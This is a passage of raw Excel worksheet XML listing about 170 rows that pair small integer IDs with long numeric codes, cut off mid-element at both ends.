        <v>1946</v>
      </c>
      <c r="B3600">
        <v>9120005930932</v>
      </c>
    </row>
    <row r="3601" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3601">
        <v>1155</v>
      </c>
      <c r="B3601">
        <v>8120003801742</v>
      </c>
    </row>
    <row r="3602" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3602">
        <v>4778</v>
      </c>
      <c r="B3602">
        <v>8120119222762</v>
      </c>
    </row>
    <row r="3603" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3603">
        <v>528</v>
      </c>
      <c r="B3603">
        <v>220002640856</v>
      </c>
    </row>
    <row r="3604" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3604">
        <v>4779</v>
      </c>
      <c r="B3604">
        <v>9120005192752</v>
      </c>
    </row>
    <row r="3605" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3605">
        <v>4780</v>
      </c>
      <c r="B3605">
        <v>9120408921502</v>
      </c>
    </row>
    <row r="3606" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3606">
        <v>4781</v>
      </c>
      <c r="B3606">
        <v>9120102350549</v>
      </c>
    </row>
    <row r="3607" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3607">
        <v>1282</v>
      </c>
      <c r="B3607">
        <v>8120317041465</v>
      </c>
    </row>
    <row r="3608" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3608">
        <v>4782</v>
      </c>
      <c r="B3608">
        <v>9120204811139</v>
      </c>
    </row>
    <row r="3609" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3609">
        <v>4783</v>
      </c>
      <c r="B3609">
        <v>220109451473</v>
      </c>
    </row>
    <row r="3610" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3610">
        <v>4784</v>
      </c>
      <c r="B3610">
        <v>220001601253</v>
      </c>
    </row>
    <row r="3611" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3611">
        <v>4785</v>
      </c>
      <c r="B3611">
        <v>8120101920146</v>
      </c>
    </row>
    <row r="3612" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3612">
        <v>4786</v>
      </c>
      <c r="B3612">
        <v>220004201693</v>
      </c>
    </row>
    <row r="3613" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3613">
        <v>4787</v>
      </c>
      <c r="B3613">
        <v>8120211160919</v>
      </c>
    </row>
    <row r="3614" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3614">
        <v>4788</v>
      </c>
      <c r="B3614">
        <v>8120006900273</v>
      </c>
    </row>
    <row r="3615" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3615">
        <v>4789</v>
      </c>
      <c r="B3615">
        <v>220104621768</v>
      </c>
    </row>
    <row r="3616" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3616">
        <v>1125</v>
      </c>
    </row>
    <row r="3617" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3617">
        <v>4791</v>
      </c>
      <c r="B3617">
        <v>9120200141153</v>
      </c>
    </row>
    <row r="3618" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3618">
        <v>4792</v>
      </c>
      <c r="B3618">
        <v>220202681505</v>
      </c>
    </row>
    <row r="3619" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3619">
        <v>963</v>
      </c>
      <c r="B3619">
        <v>8120102801461</v>
      </c>
    </row>
    <row r="3620" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3620">
        <v>4793</v>
      </c>
      <c r="B3620">
        <v>8120107830031</v>
      </c>
    </row>
    <row r="3621" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3621">
        <v>4794</v>
      </c>
      <c r="B3621">
        <v>9120000212056</v>
      </c>
    </row>
    <row r="3622" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3622">
        <v>4795</v>
      </c>
      <c r="B3622">
        <v>91202074880225</v>
      </c>
    </row>
    <row r="3623" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3623">
        <v>4796</v>
      </c>
      <c r="B3623">
        <v>220104622534</v>
      </c>
    </row>
    <row r="3624" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3624">
        <v>4797</v>
      </c>
      <c r="B3624">
        <v>9120014152781</v>
      </c>
    </row>
    <row r="3625" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3625">
        <v>624</v>
      </c>
      <c r="B3625">
        <v>9120308122931</v>
      </c>
    </row>
    <row r="3626" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3626">
        <v>4799</v>
      </c>
      <c r="B3626">
        <v>9120102211354</v>
      </c>
    </row>
    <row r="3627" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3627">
        <v>4800</v>
      </c>
      <c r="B3627">
        <v>220000612658</v>
      </c>
    </row>
    <row r="3628" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3628">
        <v>4801</v>
      </c>
      <c r="B3628">
        <v>8120017221293</v>
      </c>
    </row>
    <row r="3629" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3629">
        <v>4802</v>
      </c>
      <c r="B3629">
        <v>9120202760085</v>
      </c>
    </row>
    <row r="3630" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3630">
        <v>603</v>
      </c>
      <c r="B3630">
        <v>9120201550068</v>
      </c>
    </row>
    <row r="3631" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3631">
        <v>4803</v>
      </c>
      <c r="B3631">
        <v>220002242595</v>
      </c>
    </row>
    <row r="3632" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3632">
        <v>4804</v>
      </c>
      <c r="B3632">
        <v>220005602359</v>
      </c>
    </row>
    <row r="3633" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3633">
        <v>4805</v>
      </c>
      <c r="B3633">
        <v>9120204231517</v>
      </c>
    </row>
    <row r="3634" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3634">
        <v>4806</v>
      </c>
      <c r="B3634">
        <v>9120304772692</v>
      </c>
    </row>
    <row r="3635" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3635">
        <v>4807</v>
      </c>
      <c r="B3635">
        <v>9120005510018</v>
      </c>
    </row>
    <row r="3636" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3636">
        <v>4808</v>
      </c>
      <c r="B3636">
        <v>8120017021605</v>
      </c>
    </row>
    <row r="3637" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3637">
        <v>824</v>
      </c>
      <c r="B3637">
        <v>8120017021605</v>
      </c>
    </row>
    <row r="3638" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3638">
        <v>879</v>
      </c>
      <c r="B3638">
        <v>9120207222963</v>
      </c>
    </row>
    <row r="3639" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3639">
        <v>4809</v>
      </c>
      <c r="B3639">
        <v>220105463303</v>
      </c>
    </row>
    <row r="3640" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3640">
        <v>4810</v>
      </c>
      <c r="B3640">
        <v>9120313072117</v>
      </c>
    </row>
    <row r="3641" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3641">
        <v>4811</v>
      </c>
      <c r="B3641">
        <v>220102502086</v>
      </c>
    </row>
    <row r="3642" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3642">
        <v>4812</v>
      </c>
      <c r="B3642">
        <v>9120301952968</v>
      </c>
    </row>
    <row r="3643" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3643">
        <v>4813</v>
      </c>
      <c r="B3643">
        <v>220106131459</v>
      </c>
    </row>
    <row r="3644" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3644">
        <v>4814</v>
      </c>
      <c r="B3644">
        <v>220009582095</v>
      </c>
    </row>
    <row r="3645" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3645">
        <v>4815</v>
      </c>
      <c r="B3645">
        <v>9120104252475</v>
      </c>
    </row>
    <row r="3646" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3646">
        <v>4816</v>
      </c>
      <c r="B3646">
        <v>261010190059</v>
      </c>
    </row>
    <row r="3647" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3647">
        <v>4817</v>
      </c>
      <c r="B3647">
        <v>220104612094</v>
      </c>
    </row>
    <row r="3648" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3648">
        <v>4818</v>
      </c>
      <c r="B3648">
        <v>8120000962624</v>
      </c>
    </row>
    <row r="3649" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3649">
        <v>4819</v>
      </c>
      <c r="B3649">
        <v>8120006890397</v>
      </c>
    </row>
    <row r="3650" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3650">
        <v>4820</v>
      </c>
      <c r="B3650">
        <v>8120010130156</v>
      </c>
    </row>
    <row r="3651" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3651">
        <v>4821</v>
      </c>
      <c r="B3651">
        <v>220301691484</v>
      </c>
    </row>
    <row r="3652" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3652">
        <v>848</v>
      </c>
      <c r="B3652">
        <v>8120006722804</v>
      </c>
    </row>
    <row r="3653" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3653">
        <v>4822</v>
      </c>
      <c r="B3653">
        <v>220003461869</v>
      </c>
    </row>
    <row r="3654" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3654">
        <v>4823</v>
      </c>
      <c r="B3654">
        <v>9120103192646</v>
      </c>
    </row>
    <row r="3655" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3655">
        <v>4824</v>
      </c>
      <c r="B3655">
        <v>220208671185</v>
      </c>
    </row>
    <row r="3656" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3656">
        <v>622</v>
      </c>
      <c r="B3656">
        <v>8120203970979</v>
      </c>
    </row>
    <row r="3657" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3657">
        <v>4825</v>
      </c>
      <c r="B3657">
        <v>9120014110339</v>
      </c>
    </row>
    <row r="3658" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3658">
        <v>4826</v>
      </c>
      <c r="B3658">
        <v>9120212291594</v>
      </c>
    </row>
    <row r="3659" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3659">
        <v>4827</v>
      </c>
      <c r="B3659">
        <v>220107670643</v>
      </c>
    </row>
    <row r="3660" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3660">
        <v>4828</v>
      </c>
      <c r="B3660">
        <v>8120005871564</v>
      </c>
    </row>
    <row r="3661" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3661">
        <v>4829</v>
      </c>
      <c r="B3661">
        <v>8120014002439</v>
      </c>
    </row>
    <row r="3662" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3662">
        <v>4830</v>
      </c>
      <c r="B3662">
        <v>8120202880293</v>
      </c>
    </row>
    <row r="3663" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3663">
        <v>4831</v>
      </c>
      <c r="B3663">
        <v>9120200331356</v>
      </c>
    </row>
    <row r="3664" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3664">
        <v>993</v>
      </c>
      <c r="B3664">
        <v>8120004873214</v>
      </c>
    </row>
    <row r="3665" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3665">
        <v>4832</v>
      </c>
      <c r="B3665">
        <v>8120312051279</v>
      </c>
    </row>
    <row r="3666" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3666">
        <v>4833</v>
      </c>
      <c r="B3666">
        <v>9120207592323</v>
      </c>
    </row>
    <row r="3667" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3667">
        <v>4834</v>
      </c>
      <c r="B3667">
        <v>8120100702435</v>
      </c>
    </row>
    <row r="3668" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3668">
        <v>4835</v>
      </c>
      <c r="B3668">
        <v>220100541653</v>
      </c>
    </row>
    <row r="3669" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3669">
        <v>564</v>
      </c>
      <c r="B3669">
        <v>8120009802176</v>
      </c>
    </row>
    <row r="3670" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3670">
        <v>4836</v>
      </c>
      <c r="B3670">
        <v>220002750364</v>
      </c>
    </row>
    <row r="3671" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3671">
        <v>4837</v>
      </c>
      <c r="B3671">
        <v>9120015021409</v>
      </c>
    </row>
    <row r="3672" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3672">
        <v>4838</v>
      </c>
      <c r="B3672">
        <v>8120005861765</v>
      </c>
    </row>
    <row r="3673" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3673">
        <v>4839</v>
      </c>
      <c r="B3673">
        <v>8120001721627</v>
      </c>
    </row>
    <row r="3674" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3674">
        <v>4840</v>
      </c>
      <c r="B3674">
        <v>220008790931</v>
      </c>
    </row>
    <row r="3675" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3675">
        <v>569</v>
      </c>
      <c r="B3675">
        <v>9120503701683</v>
      </c>
    </row>
    <row r="3676" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3676">
        <v>4841</v>
      </c>
      <c r="B3676">
        <v>8120000701137</v>
      </c>
    </row>
    <row r="3677" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3677">
        <v>4842</v>
      </c>
      <c r="B3677">
        <v>9120400872497</v>
      </c>
    </row>
    <row r="3678" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3678">
        <v>4843</v>
      </c>
      <c r="B3678">
        <v>220104612094</v>
      </c>
    </row>
    <row r="3679" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3679">
        <v>932</v>
      </c>
      <c r="B3679">
        <v>8120105970633</v>
      </c>
    </row>
    <row r="3680" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3680">
        <v>4844</v>
      </c>
      <c r="B3680">
        <v>220104621768</v>
      </c>
    </row>
    <row r="3681" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3681">
        <v>4845</v>
      </c>
      <c r="B3681">
        <v>9120218022623</v>
      </c>
    </row>
    <row r="3682" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3682">
        <v>4846</v>
      </c>
      <c r="B3682">
        <v>8120217002652</v>
      </c>
    </row>
    <row r="3683" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3683">
        <v>4847</v>
      </c>
      <c r="B3683">
        <v>9120007662543</v>
      </c>
    </row>
    <row r="3684" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3684">
        <v>606</v>
      </c>
      <c r="B3684">
        <v>8120100912045</v>
      </c>
    </row>
    <row r="3685" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3685">
        <v>241</v>
      </c>
      <c r="B3685">
        <v>9120102153607</v>
      </c>
    </row>
    <row r="3686" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3686">
        <v>4848</v>
      </c>
      <c r="B3686">
        <v>8120003752084</v>
      </c>
    </row>
    <row r="3687" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3687">
        <v>892</v>
      </c>
      <c r="B3687">
        <v>8120100850114</v>
      </c>
    </row>
    <row r="3688" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3688">
        <v>4849</v>
      </c>
      <c r="B3688">
        <v>9120001450741</v>
      </c>
    </row>
    <row r="3689" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3689">
        <v>4850</v>
      </c>
      <c r="B3689">
        <v>220109692653</v>
      </c>
    </row>
    <row r="3690" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3690">
        <v>4851</v>
      </c>
      <c r="B3690">
        <v>9120006742787</v>
      </c>
    </row>
    <row r="3691" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3691">
        <v>4852</v>
      </c>
      <c r="B3691">
        <v>8120001971052</v>
      </c>
    </row>
    <row r="3692" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3692">
        <v>913</v>
      </c>
      <c r="B3692">
        <v>8120310150762</v>
      </c>
    </row>
    <row r="3693" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3693">
        <v>4853</v>
      </c>
      <c r="B3693">
        <v>8120017271423</v>
      </c>
    </row>
    <row r="3694" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3694">
        <v>4854</v>
      </c>
      <c r="B3694">
        <v>9120013020893</v>
      </c>
    </row>
    <row r="3695" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3695">
        <v>4855</v>
      </c>
      <c r="B3695">
        <v>8120015280138</v>
      </c>
    </row>
    <row r="3696" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3696">
        <v>4856</v>
      </c>
      <c r="B3696">
        <v>8120016203718</v>
      </c>
    </row>
    <row r="3697" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3697">
        <v>565</v>
      </c>
      <c r="B3697">
        <v>9120008172413</v>
      </c>
    </row>
    <row r="3698" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3698">
        <v>4857</v>
      </c>
      <c r="B3698">
        <v>220009632945</v>
      </c>
    </row>
    <row r="3699" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3699">
        <v>4858</v>
      </c>
      <c r="B3699">
        <v>220009632945</v>
      </c>
    </row>
    <row r="3700" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3700">
        <v>4859</v>
      </c>
      <c r="B3700">
        <v>220101640946</v>
      </c>
    </row>
    <row r="3701" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3701">
        <v>4860</v>
      </c>
      <c r="B3701">
        <v>220101640946</v>
      </c>
    </row>
    <row r="3702" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3702">
        <v>940</v>
      </c>
      <c r="B3702">
        <v>9120205721752</v>
      </c>
    </row>
    <row r="3703" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3703">
        <v>4861</v>
      </c>
      <c r="B3703">
        <v>9120005982287</v>
      </c>
    </row>
    <row r="3704" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3704">
        <v>4862</v>
      </c>
      <c r="B3704">
        <v>8120203932369</v>
      </c>
    </row>
    <row r="3705" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3705">
        <v>4863</v>
      </c>
      <c r="B3705">
        <v>9120205241655</v>
      </c>
    </row>
    <row r="3706" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3706">
        <v>4864</v>
      </c>
      <c r="B3706">
        <v>9120203381344</v>
      </c>
    </row>
    <row r="3707" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3707">
        <v>743</v>
      </c>
      <c r="B3707">
        <v>8120101902214</v>
      </c>
    </row>
    <row r="3708" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3708">
        <v>4865</v>
      </c>
      <c r="B3708">
        <v>9120115260926</v>
      </c>
    </row>
    <row r="3709" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3709">
        <v>16</v>
      </c>
      <c r="B3709">
        <v>8120212290061</v>
      </c>
    </row>
    <row r="3710" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3710">
        <v>4866</v>
      </c>
      <c r="B3710">
        <v>9120103980464</v>
      </c>
    </row>
    <row r="3711" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3711">
        <v>919</v>
      </c>
      <c r="B3711">
        <v>9120218022623</v>
      </c>
    </row>
    <row r="3712" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3712">
        <v>575</v>
      </c>
      <c r="B3712">
        <v>9120001450741</v>
      </c>
    </row>
    <row r="3713" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3713">
        <v>4867</v>
      </c>
      <c r="B3713">
        <v>9120018101595</v>
      </c>
    </row>
    <row r="3714" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3714">
        <v>473</v>
      </c>
      <c r="B3714">
        <v>8120114202661</v>
      </c>
    </row>
    <row r="3715" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3715">
        <v>4868</v>
      </c>
      <c r="B3715">
        <v>8120012021113</v>
      </c>
    </row>
    <row r="3716" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3716">
        <v>4869</v>
      </c>
      <c r="B3716">
        <v>220002780389</v>
      </c>
    </row>
    <row r="3717" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3717">
        <v>4870</v>
      </c>
      <c r="B3717">
        <v>9120108880738</v>
      </c>
    </row>
    <row r="3718" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3718">
        <v>1580</v>
      </c>
    </row>
    <row r="3719" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3719">
        <v>679</v>
      </c>
      <c r="B3719">
        <v>9120101751083</v>
      </c>
    </row>
    <row r="3720" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3720">
        <v>4871</v>
      </c>
      <c r="B3720">
        <v>9120213011276</v>
      </c>
    </row>
    <row r="3721" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3721">
        <v>4872</v>
      </c>
      <c r="B3721">
        <v>220109451473</v>
      </c>
    </row>
    <row r="3722" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3722">
        <v>4873</v>
      </c>
      <c r="B3722">
        <v>220105651583</v>
      </c>
    </row>
    <row r="3723" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3723">
        <v>4874</v>
      </c>
      <c r="B3723">
        <v>12255145616</v>
      </c>
    </row>
    <row r="3724" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3724">
        <v>550</v>
      </c>
      <c r="B3724" t="s">
        <v>16042</v>
      </c>
    </row>
    <row r="3725" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3725">
        <v>999</v>
      </c>
      <c r="B3725">
        <v>8120000851913</v>
      </c>
    </row>
    <row r="3726" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3726">
        <v>4875</v>
      </c>
      <c r="B3726">
        <v>9120307803304</v>
      </c>
    </row>
    <row r="3727" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3727">
        <v>4876</v>
      </c>
      <c r="B3727">
        <v>9120106250782</v>
      </c>
    </row>
    <row r="3728" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3728">
        <v>4877</v>
      </c>
      <c r="B3728">
        <v>3212161304580000</v>
      </c>
    </row>
    <row r="3729" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3729">
        <v>4878</v>
      </c>
      <c r="B3729">
        <v>9120200141153</v>
      </c>
    </row>
    <row r="3730" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3730">
        <v>4879</v>
      </c>
      <c r="B3730">
        <v>8120206860214</v>
      </c>
    </row>
    <row r="3731" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3731">
        <v>4880</v>
      </c>
      <c r="B3731">
        <v>220108471171</v>
      </c>
    </row>
    <row r="3732" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3732">
        <v>701</v>
      </c>
      <c r="B3732">
        <v>9120602172119</v>
      </c>
    </row>
    <row r="3733" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3733">
        <v>4881</v>
      </c>
      <c r="B3733">
        <v>220208112406</v>
      </c>
    </row>
    <row r="3734" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3734">
        <v>4882</v>
      </c>
      <c r="B3734">
        <v>220002162627</v>
      </c>
    </row>
    <row r="3735" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3735">
        <v>4883</v>
      </c>
      <c r="B3735">
        <v>220103132918</v>
      </c>
    </row>
    <row r="3736" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3736">
        <v>4884</v>
      </c>
      <c r="B3736">
        <v>8120304782556</v>
      </c>
    </row>
    <row r="3737" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3737">
        <v>938</v>
      </c>
      <c r="B3737">
        <v>8120304782556</v>
      </c>
    </row>
    <row r="3738" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3738">
        <v>4885</v>
      </c>
      <c r="B3738">
        <v>220302631084</v>
      </c>
    </row>
    <row r="3739" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3739">
        <v>4886</v>
      </c>
      <c r="B3739">
        <v>220102362961</v>
      </c>
    </row>
    <row r="3740" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3740">
        <v>4887</v>
      </c>
      <c r="B3740">
        <v>9120310120148</v>
      </c>
    </row>
    <row r="3741" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3741">
        <v>906</v>
      </c>
      <c r="B3741">
        <v>9120103412123</v>
      </c>
    </row>
    <row r="3742" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3742">
        <v>4888</v>
      </c>
      <c r="B3742">
        <v>220004430653</v>
      </c>
    </row>
    <row r="3743" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3743">
        <v>998</v>
      </c>
      <c r="B3743">
        <v>8120000803403</v>
      </c>
    </row>
    <row r="3744" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3744">
        <v>4889</v>
      </c>
      <c r="B3744">
        <v>9120310131255</v>
      </c>
    </row>
    <row r="3745" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3745">
        <v>631</v>
      </c>
      <c r="B3745">
        <v>9120003132942</v>
      </c>
    </row>
    <row r="3746" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3746">
        <v>4890</v>
      </c>
      <c r="B3746">
        <v>220202401647</v>
      </c>
    </row>
    <row r="3747" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3747">
        <v>721</v>
      </c>
      <c r="B3747">
        <v>8120307870726</v>
      </c>
    </row>
    <row r="3748" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3748">
        <v>396</v>
      </c>
      <c r="B3748">
        <v>8120211220938</v>
      </c>
    </row>
    <row r="3749" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3749">
        <v>4790</v>
      </c>
      <c r="B3749">
        <v>8120004791485</v>
      </c>
    </row>
    <row r="3750" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3750">
        <v>2379</v>
      </c>
      <c r="B3750">
        <v>8120107752273</v>
      </c>
    </row>
    <row r="3751" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3751">
        <v>20</v>
      </c>
      <c r="B3751">
        <v>9120500731997</v>
      </c>
    </row>
    <row r="3752" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3752">
        <v>4891</v>
      </c>
      <c r="B3752">
        <v>9120200800118</v>
      </c>
    </row>
    <row r="3753" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3753">
        <v>4892</v>
      </c>
      <c r="B3753">
        <v>9120014221864</v>
      </c>
    </row>
    <row r="3754" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3754">
        <v>4893</v>
      </c>
      <c r="B3754">
        <v>220002242595</v>
      </c>
    </row>
    <row r="3755" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3755">
        <v>4894</v>
      </c>
      <c r="B3755">
        <v>9120115131019</v>
      </c>
    </row>
    <row r="3756" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3756">
        <v>4895</v>
      </c>
      <c r="B3756">
        <v>9120205361344</v>
      </c>
    </row>
    <row r="3757" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3757">
        <v>1126</v>
      </c>
      <c r="B3757">
        <v>8120005960155</v>
      </c>
    </row>
    <row r="3758" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3758">
        <v>1970</v>
      </c>
      <c r="B3758">
        <v>8120002900537</v>
      </c>
    </row>
    <row r="3759" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3759">
        <v>4896</v>
      </c>
      <c r="B3759">
        <v>220004430653</v>
      </c>
    </row>
    <row r="3760" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3760">
        <v>4897</v>
      </c>
      <c r="B3760">
        <v>8120200702561</v>
      </c>
    </row>
    <row r="3761" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3761">
        <v>4898</v>
      </c>
      <c r="B3761">
        <v>220200200043</v>
      </c>
    </row>
    <row r="3762" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3762">
        <v>195</v>
      </c>
      <c r="B3762">
        <v>9120302361682</v>
      </c>
    </row>
    <row r="3763" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3763">
        <v>4899</v>
      </c>
      <c r="B3763">
        <v>8120101891256</v>
      </c>
    </row>
    <row r="3764" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3764">
        <v>4900</v>
      </c>
      <c r="B3764">
        <v>8120104811249</v>
      </c>
    </row>
    <row r="3765" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3765">
        <v>4901</v>
      </c>
      <c r="B3765">
        <v>8120212202307</v>
      </c>
    </row>
    <row r="3766" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3766">
        <v>4902</v>
      </c>
      <c r="B3766">
        <v>220001542957</v>
      </c>
    </row>
    <row r="3767" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3767">
        <v>4904</v>
      </c>
      <c r="B3767" t="s">
        <v>16051</v>
      </c>
    </row>
    <row r="3768" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3768">
        <v>174</v>
      </c>
      <c r="B3768">
        <v>8120001771996</v>
      </c>
    </row>
    <row r="3769" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3769">
        <v>4905</v>
      </c>
      <c r="B3769">
        <v>9120001372182</v>
      </c>
    </row>
    <row r="3770" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3770">
